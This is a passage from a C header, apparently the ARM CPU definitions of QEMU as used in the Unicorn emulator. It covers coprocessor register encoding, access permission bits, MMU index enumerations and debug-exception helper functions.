only) * We allow 4 bits for opc1 because MRRC/MCRR have a 4 bit field. * (In this case crn and opc2 should be zero.) * For AArch64, there is no 32/64 bit size distinction; * instead all registers have a 2 bit op0, 3 bit op1 and op2, * and 4 bit CRn and CRm. The encoding patterns are chosen * to be easy to convert to and from the KVM encodings, and also * so that the hashtable can contain both AArch32 and AArch64 * registers (to allow for interprocessing where we might run * 32 bit code on a 64 bit core). */ /* This bit is private to our hashtable cpreg; in KVM register * IDs the AArch64/32 distinction is the KVM_REG_ARM/ARM64 * in the upper bits of the 64 bit ID. */ #define CP_REG_AA64_SHIFT 28 #define CP_REG_AA64_MASK (1 << CP_REG_AA64_SHIFT) /* To enable banking of coprocessor registers depending on ns-bit we * add a bit to distinguish between secure and non-secure cpregs in the * hashtable. 
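 *
 * As a worked example of the resulting key layout (using the macros defined
 * just below): the AArch32, 32-bit, non-secure DACR (cp15, crn=3, crm=0,
 * opc1=0, opc2=0) hashes as
 *   ENCODE_CP_REG(15, 0, 1, 3, 0, 0, 0)
 *     == (1 << 29) | (15 << 16) | (3 << 11)
 *     == 0x200f1800
 */
#if 0 /* Illustrative check only, not compiled. */
QEMU_BUILD_BUG_ON(ENCODE_CP_REG(15, 0, 1, 3, 0, 0, 0) != 0x200f1800);
#endif
/*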
*/ #define CP_REG_NS_SHIFT 29 #define CP_REG_NS_MASK (1 << CP_REG_NS_SHIFT) #define ENCODE_CP_REG(cp, is64, ns, crn, crm, opc1, opc2) \ ((ns) << CP_REG_NS_SHIFT | ((cp) << 16) | ((is64) << 15) | \ ((crn) << 11) | ((crm) << 7) | ((opc1) << 3) | (opc2)) #define ENCODE_AA64_CP_REG(cp, crn, crm, op0, op1, op2) \ (CP_REG_AA64_MASK | \ ((cp) << CP_REG_ARM_COPROC_SHIFT) | \ ((op0) << CP_REG_ARM64_SYSREG_OP0_SHIFT) | \ ((op1) << CP_REG_ARM64_SYSREG_OP1_SHIFT) | \ ((crn) << CP_REG_ARM64_SYSREG_CRN_SHIFT) | \ ((crm) << CP_REG_ARM64_SYSREG_CRM_SHIFT) | \ ((op2) << CP_REG_ARM64_SYSREG_OP2_SHIFT)) #if 0 /* Convert a full 64 bit KVM register ID to the truncated 32 bit * version used as a key for the coprocessor register hashtable */ static inline uint32_t kvm_to_cpreg_id(uint64_t kvmid) { uint32_t cpregid = kvmid; if ((kvmid & CP_REG_ARCH_MASK) == CP_REG_ARM64) { cpregid |= CP_REG_AA64_MASK; } else { if ((kvmid & CP_REG_SIZE_MASK) == CP_REG_SIZE_U64) { cpregid |= (1 << 15); } /* KVM is always non-secure so add the NS flag on AArch32 register * entries. */ cpregid |= 1 << CP_REG_NS_SHIFT; } return cpregid; } /* Convert a truncated 32 bit hashtable key into the full * 64 bit KVM register ID. */ static inline uint64_t cpreg_to_kvm_id(uint32_t cpregid) { uint64_t kvmid; if (cpregid & CP_REG_AA64_MASK) { kvmid = cpregid & ~CP_REG_AA64_MASK; kvmid |= CP_REG_SIZE_U64 | CP_REG_ARM64; } else { kvmid = cpregid & ~(1 << 15); if (cpregid & (1 << 15)) { kvmid |= CP_REG_SIZE_U64 | CP_REG_ARM; } else { kvmid |= CP_REG_SIZE_U32 | CP_REG_ARM; } } return kvmid; } #endif /* ARMCPRegInfo type field bits. If the SPECIAL bit is set this is a * special-behaviour cp reg and bits [11..8] indicate what behaviour * it has. Otherwise it is a simple cp reg, where CONST indicates that * TCG can assume the value to be constant (ie load at translate time) * and 64BIT indicates a 64 bit wide coprocessor register. SUPPRESS_TB_END * indicates that the TB should not be ended after a write to this register * (the default is that the TB ends after cp writes). OVERRIDE permits * a register definition to override a previous definition for the * same (cp, is64, crn, crm, opc1, opc2) tuple: either the new or the * old must have the OVERRIDE bit set. * ALIAS indicates that this register is an alias view of some underlying * state which is also visible via another register, and that the other * register is handling migration and reset; registers marked ALIAS will not be * migrated but may have their state set by syncing of register state from KVM. * NO_RAW indicates that this register has no underlying state and does not * support raw access for state saving/loading; it will not be used for either * migration or KVM state synchronization. (Typically this is for "registers" * which are actually used as instructions for cache maintenance and so on.) * IO indicates that this register does I/O and therefore its accesses * need to be surrounded by gen_io_start()/gen_io_end(). In particular, * registers which implement clocks or timers require this. * RAISES_EXC is for when the read or write hook might raise an exception; * the generated code will synchronize the CPU state before calling the hook * so that it is safe for the hook to call raise_exception(). * NEWEL is for writes to registers that might change the exception * level - typically on older ARM chips. For those cases we need to * re-read the new el when recomputing the translation flags. 
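 *
 * For instance, with the values defined just below: ARM_CP_NOP is
 * (ARM_CP_SPECIAL | 0x0100) == 0x0101, and masking with ~ARM_CP_FLAG_MASK
 * recovers the special-behaviour code 0x0100, which cptype_valid() then
 * range-checks against ARM_LAST_SPECIAL.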
*/ #define ARM_CP_SPECIAL 0x0001 #define ARM_CP_CONST 0x0002 #define ARM_CP_64BIT 0x0004 #define ARM_CP_SUPPRESS_TB_END 0x0008 #define ARM_CP_OVERRIDE 0x0010 #define ARM_CP_ALIAS 0x0020 #define ARM_CP_IO 0x0040 #define ARM_CP_NO_RAW 0x0080 #define ARM_CP_NOP (ARM_CP_SPECIAL | 0x0100) #define ARM_CP_WFI (ARM_CP_SPECIAL | 0x0200) #define ARM_CP_NZCV (ARM_CP_SPECIAL | 0x0300) #define ARM_CP_CURRENTEL (ARM_CP_SPECIAL | 0x0400) #define ARM_CP_DC_ZVA (ARM_CP_SPECIAL | 0x0500) #define ARM_LAST_SPECIAL ARM_CP_DC_ZVA #define ARM_CP_FPU 0x1000 #define ARM_CP_SVE 0x2000 #define ARM_CP_NO_GDB 0x4000 #define ARM_CP_RAISES_EXC 0x8000 #define ARM_CP_NEWEL 0x10000 /* Used only as a terminator for ARMCPRegInfo lists */ #define ARM_CP_SENTINEL 0xfffff /* Mask of only the flag bits in a type field */ #define ARM_CP_FLAG_MASK 0x1f0ff /* Valid values for ARMCPRegInfo state field, indicating which of * the AArch32 and AArch64 execution states this register is visible in. * If the reginfo doesn't explicitly specify then it is AArch32 only. * If the reginfo is declared to be visible in both states then a second * reginfo is synthesised for the AArch32 view of the AArch64 register, * such that the AArch32 view is the lower 32 bits of the AArch64 one. * Note that we rely on the values of these enums as we iterate through * the various states in some places. */ enum { ARM_CP_STATE_AA32 = 0, ARM_CP_STATE_AA64 = 1, ARM_CP_STATE_BOTH = 2, }; /* ARM CP register secure state flags. These flags identify security state * attributes for a given CP register entry. * The existence of both or neither secure and non-secure flags indicates that * the register has both a secure and non-secure hash entry. A single one of * these flags causes the register to only be hashed for the specified * security state. * Although definitions may have any combination of the S/NS bits, each * registered entry will only have one to identify whether the entry is secure * or non-secure. */ enum { ARM_CP_SECSTATE_S = (1 << 0), /* bit[0]: Secure state register */ ARM_CP_SECSTATE_NS = (1 << 1), /* bit[1]: Non-secure state register */ }; /* Return true if cptype is a valid type field. This is used to try to * catch errors where the sentinel has been accidentally left off the end * of a list of registers. */ static inline bool cptype_valid(int cptype) { return ((cptype & ~ARM_CP_FLAG_MASK) == 0) || ((cptype & ARM_CP_SPECIAL) && ((cptype & ~ARM_CP_FLAG_MASK) <= ARM_LAST_SPECIAL)); } /* Access rights: * We define bits for Read and Write access for what rev C of the v7-AR ARM ARM * defines as PL0 (user), PL1 (fiq/irq/svc/abt/und/sys, ie privileged), and * PL2 (hyp). The other level which has Read and Write bits is Secure PL1 * (ie any of the privileged modes in Secure state, or Monitor mode). * If a register is accessible in one privilege level it's always accessible * in higher privilege levels too. Since "Secure PL1" also follows this rule * (ie anything visible in PL2 is visible in S-PL1, some things are only * visible in S-PL1) but "Secure PL1" is a bit of a mouthful, we bend the * terminology a little and call this PL3. * In AArch64 things are somewhat simpler as the PLx bits line up exactly * with the ELx exception levels. * * If access permissions for a register are more complex than can be * described with these bits, then use a laxer set of restrictions, and * do the more restrictive/complex check inside a helper function. 
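 *
 * Worked example with the bit values defined just below: PL1_R expands to
 * 0x08 | 0x20 | 0x80 == 0xa8, so cp_access_ok() (later in this header) sees
 * the read bit set for EL1, EL2 and EL3 but clear for EL0 -- higher
 * privilege levels inherit access.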
*/ #define PL3_R 0x80 #define PL3_W 0x40 #define PL2_R (0x20 | PL3_R) #define PL2_W (0x10 | PL3_W) #define PL1_R (0x08 | PL2_R) #define PL1_W (0x04 | PL2_W) #define PL0_R (0x02 | PL1_R) #define PL0_W (0x01 | PL1_W) /* * For user-mode some registers are accessible to EL0 via a kernel * trap-and-emulate ABI. In this case we define the read permissions * as actually being PL0_R. However some bits of any given register * may still be masked. */ #define PL0U_R PL1_R #define PL3_RW (PL3_R | PL3_W) #define PL2_RW (PL2_R | PL2_W) #define PL1_RW (PL1_R | PL1_W) #define PL0_RW (PL0_R | PL0_W) /* Return the highest implemented Exception Level */ static inline int arm_highest_el(CPUARMState *env) { if (arm_feature(env, ARM_FEATURE_EL3)) { return 3; } if (arm_feature(env, ARM_FEATURE_EL2)) { return 2; } return 1; } /* Return true if a v7M CPU is in Handler mode */ static inline bool arm_v7m_is_handler_mode(CPUARMState *env) { return env->v7m.exception != 0; } /* Return the current Exception Level (as per ARMv8; note that this differs * from the ARMv7 Privilege Level). */ static inline int arm_current_el(CPUARMState *env) { if (arm_feature(env, ARM_FEATURE_M)) { return arm_v7m_is_handler_mode(env) || !(env->v7m.control[env->v7m.secure] & 1); } if (is_a64(env)) { return extract32(env->pstate, 2, 2); } switch (env->uncached_cpsr & 0x1f) { case ARM_CPU_MODE_USR: return 0; case ARM_CPU_MODE_HYP: return 2; case ARM_CPU_MODE_MON: return 3; default: if (arm_is_secure(env) && !arm_el_is_aa64(env, 3)) { /* If EL3 is 32-bit then all secure privileged modes run in * EL3 */ return 3; } return 1; } } typedef struct ARMCPRegInfo ARMCPRegInfo; typedef enum CPAccessResult { /* Access is permitted */ CP_ACCESS_OK = 0, /* Access fails due to a configurable trap or enable which would * result in a categorized exception syndrome giving information about * the failing instruction (ie syndrome category 0x3, 0x4, 0x5, 0x6, * 0xc or 0x18). The exception is taken to the usual target EL (EL1 or * PL1 if in EL0, otherwise to the current EL). */ CP_ACCESS_TRAP = 1, /* Access fails and results in an exception syndrome 0x0 ("uncategorized"). * Note that this is not a catch-all case -- the set of cases which may * result in this failure is specifically defined by the architecture. */ CP_ACCESS_TRAP_UNCATEGORIZED = 2, /* As CP_ACCESS_TRAP, but for traps directly to EL2 or EL3 */ CP_ACCESS_TRAP_EL2 = 3, CP_ACCESS_TRAP_EL3 = 4, /* As CP_ACCESS_UNCATEGORIZED, but for traps directly to EL2 or EL3 */ CP_ACCESS_TRAP_UNCATEGORIZED_EL2 = 5, CP_ACCESS_TRAP_UNCATEGORIZED_EL3 = 6, /* Access fails and results in an exception syndrome for an FP access, * trapped directly to EL2 or EL3 */ CP_ACCESS_TRAP_FP_EL2 = 7, CP_ACCESS_TRAP_FP_EL3 = 8, } CPAccessResult; /* Access functions for coprocessor registers. These cannot fail and * may not raise exceptions. */ typedef uint64_t CPReadFn(CPUARMState *env, const ARMCPRegInfo *opaque); typedef void CPWriteFn(CPUARMState *env, const ARMCPRegInfo *opaque, uint64_t value); /* Access permission check functions for coprocessor registers. */ typedef CPAccessResult CPAccessFn(CPUARMState *env, const ARMCPRegInfo *opaque, bool isread); /* Hook function for register reset */ typedef void CPResetFn(CPUARMState *env, const ARMCPRegInfo *opaque); #define CP_ANY 0xff /* Definition of an ARM coprocessor register */ struct ARMCPRegInfo { /* Name of register (useful mainly for debugging, need not be unique) */ const char *name; /* Location of register: coprocessor number and (crn,crm,opc1,opc2) * tuple. 
Any of crm, opc1 and opc2 may be CP_ANY to indicate a * 'wildcard' field -- any value of that field in the MRC/MCR insn * will be decoded to this register. The register read and write * callbacks will be passed an ARMCPRegInfo with the crn/crm/opc1/opc2 * used by the program, so it is possible to register a wildcard and * then behave differently on read/write if necessary. * For 64 bit registers, only crm and opc1 are relevant; crn and opc2 * must both be zero. * For AArch64-visible registers, opc0 is also used. * Since there are no "coprocessors" in AArch64, cp is purely used as a * way to distinguish (for KVM's benefit) guest-visible system registers * from demuxed ones provided to preserve the "no side effects on * KVM register read/write from QEMU" semantics. cp==0x13 is guest * visible (to match KVM's encoding); cp==0 will be converted to * cp==0x13 when the ARMCPRegInfo is registered, for convenience. */ uint8_t cp; uint8_t crn; uint8_t crm; uint8_t opc0; uint8_t opc1; uint8_t opc2; /* Execution state in which this register is visible: ARM_CP_STATE_* */ int state; /* Register type: ARM_CP_* bits/values */ int type; /* Access rights: PL*_[RW] */ int access; /* Security state: ARM_CP_SECSTATE_* bits/values */ int secure; /* The opaque pointer passed to define_arm_cp_regs_with_opaque() when * this register was defined: can be used to hand data through to the * register read/write functions, since they are passed the ARMCPRegInfo*. */ void *opaque; /* Value of this register, if it is ARM_CP_CONST. Otherwise, if * fieldoffset is non-zero, the reset value of the register. */ uint64_t resetvalue; /* Offset of the field in CPUARMState for this register. * * This is not needed if either: * 1. type is ARM_CP_CONST or one of the ARM_CP_SPECIALs * 2. both readfn and writefn are specified */ ptrdiff_t fieldoffset; /* offsetof(CPUARMState, field) */ /* Offsets of the secure and non-secure fields in CPUARMState for the * register if it is banked. These fields are only used during the static * registration of a register. During hashing the bank associated * with a given security state is copied to fieldoffset which is used from * there on out. * * It is expected that register definitions use either fieldoffset or * bank_fieldoffsets in the definition but not both. It is also expected * that both bank offsets are set when defining a banked register. This * use indicates that a register is banked. */ ptrdiff_t bank_fieldoffsets[2]; /* Function for making any access checks for this register in addition to * those specified by the 'access' permissions bits. If NULL, no extra * checks required. The access check is performed at runtime, not at * translate time. */ CPAccessFn *accessfn; /* Function for handling reads of this register. If NULL, then reads * will be done by loading from the offset into CPUARMState specified * by fieldoffset. */ CPReadFn *readfn; /* Function for handling writes of this register. If NULL, then writes * will be done by writing to the offset into CPUARMState specified * by fieldoffset. */ CPWriteFn *writefn; /* Function for doing a "raw" read; used when we need to copy * coprocessor state to the kernel for KVM or out for * migration. This only needs to be provided if there is also a * readfn and it has side effects (for instance clear-on-read bits). */ CPReadFn *raw_readfn; /* Function for doing a "raw" write; used when we need to copy KVM * kernel coprocessor state into userspace, or for inbound * migration. 
This only needs to be provided if there is also a * writefn and it masks out "unwritable" bits or has write-one-to-clear * or similar behaviour. */ CPWriteFn *raw_writefn; /* Function for resetting the register. If NULL, then reset will be done * by writing resetvalue to the field specified in fieldoffset. If * fieldoffset is 0 then no reset will be done. */ CPResetFn *resetfn; /* * "Original" writefn and readfn. * For ARMv8.1-VHE register aliases, we overwrite the read/write * accessor functions of various EL1/EL0 to perform the runtime * check for which sysreg should actually be modified, and then * forwards the operation. Before overwriting the accessors, * the original function is copied here, so that accesses that * really do go to the EL1/EL0 version proceed normally. * (The corresponding EL2 register is linked via opaque.) */ CPReadFn *orig_readfn; CPWriteFn *orig_writefn; }; /* Macros which are lvalues for the field in CPUARMState for the * ARMCPRegInfo *ri. */ #define CPREG_FIELD32(env, ri) \ (*(uint32_t *)((char *)(env) + (ri)->fieldoffset)) #define CPREG_FIELD64(env, ri) \ (*(uint64_t *)((char *)(env) + (ri)->fieldoffset)) #define REGINFO_SENTINEL { .type = ARM_CP_SENTINEL } void define_arm_cp_regs_with_opaque(ARMCPU *cpu, const ARMCPRegInfo *regs, void *opaque); void define_one_arm_cp_reg_with_opaque(ARMCPU *cpu, const ARMCPRegInfo *regs, void *opaque); static inline void define_arm_cp_regs(ARMCPU *cpu, const ARMCPRegInfo *regs) { define_arm_cp_regs_with_opaque(cpu, regs, 0); } static inline void define_one_arm_cp_reg(ARMCPU *cpu, const ARMCPRegInfo *regs) { define_one_arm_cp_reg_with_opaque(cpu, regs, 0); } const ARMCPRegInfo *get_arm_cp_reginfo(GHashTable *cpregs, uint32_t encoded_cp); /* * Definition of an ARM co-processor register as viewed from * userspace. This is used for presenting sanitised versions of * registers to userspace when emulating the Linux AArch64 CPU * ID/feature ABI (advertised as HWCAP_CPUID). */ typedef struct ARMCPRegUserSpaceInfo { /* Name of register */ const char *name; /* Is the name actually a glob pattern */ bool is_glob; /* Only some bits are exported to user space */ uint64_t exported_bits; /* Fixed bits are applied after the mask */ uint64_t fixed_bits; } ARMCPRegUserSpaceInfo; #define REGUSERINFO_SENTINEL { .name = NULL } void modify_arm_cp_regs(ARMCPRegInfo *regs, const ARMCPRegUserSpaceInfo *mods); /* CPWriteFn that can be used to implement writes-ignored behaviour */ void arm_cp_write_ignore(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value); /* CPReadFn that can be used for read-as-zero behaviour */ uint64_t arm_cp_read_zero(CPUARMState *env, const ARMCPRegInfo *ri); /* CPResetFn that does nothing, for use if no reset is required even * if fieldoffset is non zero. */ void arm_cp_reset_ignore(CPUARMState *env, const ARMCPRegInfo *opaque); /* Return true if this reginfo struct's field in the cpu state struct * is 64 bits wide. */ static inline bool cpreg_field_is_64bit(const ARMCPRegInfo *ri) { return (ri->state == ARM_CP_STATE_AA64) || (ri->type & ARM_CP_64BIT); } static inline bool cp_access_ok(int current_el, const ARMCPRegInfo *ri, int isread) { return (ri->access >> ((current_el * 2) + isread)) & 1; } /* Raw read of a coprocessor register (as needed for migration, etc) */ uint64_t read_raw_cp_reg(CPUARMState *env, const ARMCPRegInfo *ri); /** * write_list_to_cpustate * @cpu: ARMCPU * * For each register listed in the ARMCPU cpreg_indexes list, write * its value from the cpreg_values list into the ARMCPUState structure. 
* This updates TCG's working data structures from KVM data or * from incoming migration state. * * Returns: true if all register values were updated correctly, * false if some register was unknown or could not be written. * Note that we do not stop early on failure -- we will attempt * writing all registers in the list. */ bool write_list_to_cpustate(ARMCPU *cpu); /** * write_cpustate_to_list: * @cpu: ARMCPU * @kvm_sync: true if this is for syncing back to KVM * * For each register listed in the ARMCPU cpreg_indexes list, write * its value from the ARMCPUState structure into the cpreg_values list. * This is used to copy info from TCG's working data structures into * KVM or for outbound migration. * * @kvm_sync is true if we are doing this in order to sync the * register state back to KVM. In this case we will only update * values in the list if the previous list->cpustate sync actually * successfully wrote the CPU state. Otherwise we will keep the value * that is in the list. * * Returns: true if all register values were read correctly, * false if some register was unknown or could not be read. * Note that we do not stop early on failure -- we will attempt * reading all registers in the list. */ bool write_cpustate_to_list(ARMCPU *cpu, bool kvm_sync); #define ARM_CPUID_TI915T 0x54029152 #define ARM_CPUID_TI925T 0x54029252 #define ARM_CPU_TYPE_SUFFIX "-" TYPE_ARM_CPU #define ARM_CPU_TYPE_NAME(name) (name ARM_CPU_TYPE_SUFFIX) #define CPU_RESOLVING_TYPE TYPE_ARM_CPU #define cpu_signal_handler cpu_arm_signal_handler #define cpu_list arm_cpu_list /* ARM has the following "translation regimes" (as the ARM ARM calls them): * * If EL3 is 64-bit: * + NonSecure EL1 & 0 stage 1 * + NonSecure EL1 & 0 stage 2 * + NonSecure EL2 * + NonSecure EL2 & 0 (ARMv8.1-VHE) * + Secure EL1 & 0 * + Secure EL3 * If EL3 is 32-bit: * + NonSecure PL1 & 0 stage 1 * + NonSecure PL1 & 0 stage 2 * + NonSecure PL2 * + Secure PL0 * + Secure PL1 * (reminder: for 32 bit EL3, Secure PL1 is *EL3*, not EL1.) * * For QEMU, an mmu_idx is not quite the same as a translation regime because: * 1. we need to split the "EL1 & 0" and "EL2 & 0" regimes into two mmu_idxes, * because they may differ in access permissions even if the VA->PA map is * the same * 2. we want to cache in our TLB the full VA->IPA->PA lookup for a stage 1+2 * translation, which means that we have one mmu_idx that deals with two * concatenated translation regimes [this sort of combined s1+2 TLB is * architecturally permitted] * 3. we don't need to allocate an mmu_idx to translations that we won't be * handling via the TLB. The only way to do a stage 1 translation without * the immediate stage 2 translation is via the ATS or AT system insns, * which can be slow-pathed and always do a page table walk. * 4. we can also safely fold together the "32 bit EL3" and "64 bit EL3" * translation regimes, because they map reasonably well to each other * and they can't both be active at the same time. * 5. we want to be able to use the TLB for accesses done as part of a * stage1 page table walk, rather than having to walk the stage2 page * table over and over. * 6. we need separate EL1/EL2 mmu_idx for handling the Privileged Access * Never (PAN) bit within PSTATE. 
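 * (For example, with PSTATE.PAN set, a load at NS EL1 from a page that is
 * EL0-accessible must fault even though the EL1 translation is otherwise
 * valid, so the +PAN variants below cache different permission bits for
 * the same VA->PA mapping.)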
 *
 * This gives us the following list of cases:
 *
 * NS EL0 EL1&0 stage 1+2 (aka NS PL0)
 * NS EL1 EL1&0 stage 1+2 (aka NS PL1)
 * NS EL1 EL1&0 stage 1+2 +PAN
 * NS EL0 EL2&0
 * NS EL2 EL2&0
 * NS EL2 EL2&0 +PAN
 * NS EL2 (aka NS PL2)
 * S EL0 EL1&0 (aka S PL0)
 * S EL1 EL1&0 (not used if EL3 is 32 bit)
 * S EL1 EL1&0 +PAN
 * S EL3 (aka S PL1)
 * NS EL1&0 stage 2
 *
 * for a total of 12 different mmu_idx.
 *
 * R profile CPUs have an MPU, but can use the same set of MMU indexes
 * as A profile. They only need to distinguish NS EL0 and NS EL1 (and
 * NS EL2 if we ever model a Cortex-R52).
 *
 * M profile CPUs are rather different as they do not have a true MMU.
 * They have the following different MMU indexes:
 *  User
 *  Privileged
 *  User, execution priority negative (ie the MPU HFNMIENA bit may apply)
 *  Privileged, execution priority negative (ditto)
 * If the CPU supports the v8M Security Extension then there are also:
 *  Secure User
 *  Secure Privileged
 *  Secure User, execution priority negative
 *  Secure Privileged, execution priority negative
 *
 * The ARMMMUIdx and the mmu index value used by the core QEMU TLB code
 * are not quite the same -- different CPU types (most notably M profile
 * vs A/R profile) would like to use MMU indexes with different semantics,
 * but since we don't ever need to use all of those in a single CPU we
 * can avoid setting NB_MMU_MODES to more than 8. The lower bits of
 * ARMMMUIdx are the core TLB mmu index, and the higher bits are always
 * the same for any particular CPU.
 * Variables of type ARMMMUIdx are always full values, and the core
 * index values are in variables of type 'int'.
 *
 * Our enumeration includes at the end some entries which are not "true"
 * mmu_idx values in that they don't have corresponding TLBs and are only
 * valid for doing slow path page table walks.
 *
 * The constant names here are patterned after the general style of the names
 * of the AT/ATS operations.
 * The values used are carefully arranged to make mmu_idx => EL lookup easy.
 * For M profile we arrange them to have a bit for priv, a bit for negpri
 * and a bit for secure.
 */
#define ARM_MMU_IDX_A     0x10 /* A profile */
#define ARM_MMU_IDX_NOTLB 0x20 /* does not have a TLB */
#define ARM_MMU_IDX_M     0x40 /* M profile */

/* Meanings of the bits for M profile mmu idx values */
#define ARM_MMU_IDX_M_PRIV   0x1
#define ARM_MMU_IDX_M_NEGPRI 0x2
#define ARM_MMU_IDX_M_S      0x4 /* Secure */

#define ARM_MMU_IDX_TYPE_MASK \
    (ARM_MMU_IDX_A | ARM_MMU_IDX_M | ARM_MMU_IDX_NOTLB)
#define ARM_MMU_IDX_COREIDX_MASK 0xf

typedef enum ARMMMUIdx {
    /*
     * A-profile.
     */
    ARMMMUIdx_E10_0      =  0 | ARM_MMU_IDX_A,
    ARMMMUIdx_E20_0      =  1 | ARM_MMU_IDX_A,
    ARMMMUIdx_E10_1      =  2 | ARM_MMU_IDX_A,
    ARMMMUIdx_E10_1_PAN  =  3 | ARM_MMU_IDX_A,
    ARMMMUIdx_E2         =  4 | ARM_MMU_IDX_A,
    ARMMMUIdx_E20_2      =  5 | ARM_MMU_IDX_A,
    ARMMMUIdx_E20_2_PAN  =  6 | ARM_MMU_IDX_A,
    ARMMMUIdx_SE10_0     =  7 | ARM_MMU_IDX_A,
    ARMMMUIdx_SE10_1     =  8 | ARM_MMU_IDX_A,
    ARMMMUIdx_SE10_1_PAN =  9 | ARM_MMU_IDX_A,
    ARMMMUIdx_SE3        = 10 | ARM_MMU_IDX_A,
    ARMMMUIdx_Stage2     = 11 | ARM_MMU_IDX_A,

    /*
     * These are not allocated TLBs and are used only for AT system
     * instructions or for the first stage of an S12 page table walk.
     */
    ARMMMUIdx_Stage1_E0 = 0 | ARM_MMU_IDX_NOTLB,
    ARMMMUIdx_Stage1_E1 = 1 | ARM_MMU_IDX_NOTLB,
    ARMMMUIdx_Stage1_E1_PAN = 2 | ARM_MMU_IDX_NOTLB,

    /*
     * M-profile.
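     * An M-profile index is built by OR-ing the bits defined above; as an
     * illustrative bit of arithmetic (not new definitions):
     *   ARMMMUIdx_MUser        = 0x40
     *   ARMMMUIdx_MPriv        = 0x40 | 0x1              = 0x41
     *   ARMMMUIdx_MSPrivNegPri = 0x40 | 0x1 | 0x2 | 0x4  = 0x47
     * and the core TLB index is (idx & ARM_MMU_IDX_COREIDX_MASK),
     * i.e. 7 for ARMMMUIdx_MSPrivNegPri.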
*/ ARMMMUIdx_MUser = ARM_MMU_IDX_M, ARMMMUIdx_MPriv = ARM_MMU_IDX_M | ARM_MMU_IDX_M_PRIV, ARMMMUIdx_MUserNegPri = ARMMMUIdx_MUser | ARM_MMU_IDX_M_NEGPRI, ARMMMUIdx_MPrivNegPri = ARMMMUIdx_MPriv | ARM_MMU_IDX_M_NEGPRI, ARMMMUIdx_MSUser = ARMMMUIdx_MUser | ARM_MMU_IDX_M_S, ARMMMUIdx_MSPriv = ARMMMUIdx_MPriv | ARM_MMU_IDX_M_S, ARMMMUIdx_MSUserNegPri = ARMMMUIdx_MUserNegPri | ARM_MMU_IDX_M_S, ARMMMUIdx_MSPrivNegPri = ARMMMUIdx_MPrivNegPri | ARM_MMU_IDX_M_S, } ARMMMUIdx; /* * Bit macros for the core-mmu-index values for each index, * for use when calling tlb_flush_by_mmuidx() and friends. */ #define TO_CORE_BIT(NAME) \ ARMMMUIdxBit_##NAME = 1 << (ARMMMUIdx_##NAME & ARM_MMU_IDX_COREIDX_MASK) typedef enum ARMMMUIdxBit { TO_CORE_BIT(E10_0), TO_CORE_BIT(E20_0), TO_CORE_BIT(E10_1), TO_CORE_BIT(E10_1_PAN), TO_CORE_BIT(E2), TO_CORE_BIT(E20_2), TO_CORE_BIT(E20_2_PAN), TO_CORE_BIT(SE10_0), TO_CORE_BIT(SE10_1), TO_CORE_BIT(SE10_1_PAN), TO_CORE_BIT(SE3), TO_CORE_BIT(Stage2), TO_CORE_BIT(MUser), TO_CORE_BIT(MPriv), TO_CORE_BIT(MUserNegPri), TO_CORE_BIT(MPrivNegPri), TO_CORE_BIT(MSUser), TO_CORE_BIT(MSPriv), TO_CORE_BIT(MSUserNegPri), TO_CORE_BIT(MSPrivNegPri), } ARMMMUIdxBit; #undef TO_CORE_BIT #define MMU_USER_IDX 0 /* Indexes used when registering address spaces with cpu_address_space_init */ typedef enum ARMASIdx { ARMASIdx_NS = 0, ARMASIdx_S = 1, } ARMASIdx; /* Return the Exception Level targeted by debug exceptions. */ static inline int arm_debug_target_el(CPUARMState *env) { bool secure = arm_is_secure(env); bool route_to_el2 = false; if (arm_feature(env, ARM_FEATURE_EL2) && !secure) { route_to_el2 = env->cp15.hcr_el2 & HCR_TGE || env->cp15.mdcr_el2 & MDCR_TDE; } if (route_to_el2) { return 2; } else if (arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3) && secure) { return 3; } else { return 1; } } static inline bool arm_v7m_csselr_razwi(ARMCPU *cpu) { /* If all the CLIDR.Ctypem bits are 0 there are no caches, and * CSSELR is RAZ/WI. */ return (cpu->clidr & R_V7M_CLIDR_CTYPE_ALL_MASK) != 0; } /* See AArch64.GenerateDebugExceptionsFrom() in ARM ARM pseudocode */ static inline bool aa64_generate_debug_exceptions(CPUARMState *env) { int cur_el = arm_current_el(env); int debug_el; if (cur_el == 3) { return false; } /* MDCR_EL3.SDD disables debug events from Secure state */ if (arm_is_secure_below_el3(env) && extract32(env->cp15.mdcr_el3, 16, 1)) { return false; } /* * Same EL to same EL debug exceptions need MDSCR_KDE enabled * while not masking the (D)ebug bit in DAIF. */ debug_el = arm_debug_target_el(env); if (cur_el == debug_el) { return extract32(env->cp15.mdscr_el1, 13, 1) && !(env->daif & PSTATE_D); } /* Otherwise the debug target needs to be a higher EL */ return debug_el > cur_el; } static inline bool aa32_generate_debug_exceptions(CPUARMState *env) { int el = arm_current_el(env); if (el == 0 && arm_el_is_aa64(env, 1)) { return aa64_generate_debug_exceptions(env); } if (arm_is_secure(env)) { int spd; if (el == 0 && (env->cp15.sder & 1)) { /* SDER.SUIDEN means debug exceptions from Secure EL0 * are always enabled. Otherwise they are controlled by * SDCR.SPD like those from other Secure ELs. */ return true; } spd = extract32(env->cp15.mdcr_el3, 14, 2); switch (spd) { case 1: /* SPD == 0b01 is reserved, but behaves as 0b00. */ case 0: /* For 0b00 we return true if external secure invasive debug * is enabled. On real hardware this is controlled by external * signals to the core. QEMU always permits debug, and behaves * as if DBGEN, SPIDEN, NIDEN and SPNIDEN are all tied high. 
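             * (MDCR_EL3.SPD encodings: 0b00 controlled by the external
             * signals, 0b01 reserved and treated as 0b00, 0b10 secure
             * privileged debug disabled, 0b11 enabled -- hence the case
             * arms below.)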
*/ return true; case 2: return false; case 3: return true; } } return el != 2; } /* Return true if debugging exceptions are currently enabled. * This corresponds to what in ARM ARM pseudocode would be * if UsingAArch32() then * return AArch32.GenerateDebugExceptions() * else * return AArch64.GenerateDebugExceptions() * We choose to push the if() down into this function for clarity, * since the pseudocode has it at all callsites except for the one in * CheckSoftwareStep(), where it is elided because both branches would * always return the same value. */ static inline bool arm_generate_debug_exceptions(CPUARMState *env) { if (env->aarch64) { return aa64_generate_debug_exceptions(env); } else { return aa32_generate_debug_exceptions(env); } } /* Is single-stepping active? (Note that the "is EL_D AArch64?" check * implicitly means this always returns false in pre-v8 CPUs.) */ static inline bool arm_singlestep_active(CPUARMState *env) { return extract32(env->cp15.mdscr_el1, 0, 1) && arm_el_is_aa64(env, arm_debug_target_el(env)) && arm_generate_debug_exceptions(env); } static inline bool arm_sctlr_b(CPUARMState *env) { return /* We need not implement SCTLR.ITD in user-mode emulation, so * let linux-user ignore the fact that it conflicts with SCTLR_B. * This lets people run BE32 binaries with "-cpu any". */ // Unicorn: Our hack to support BE32 mode 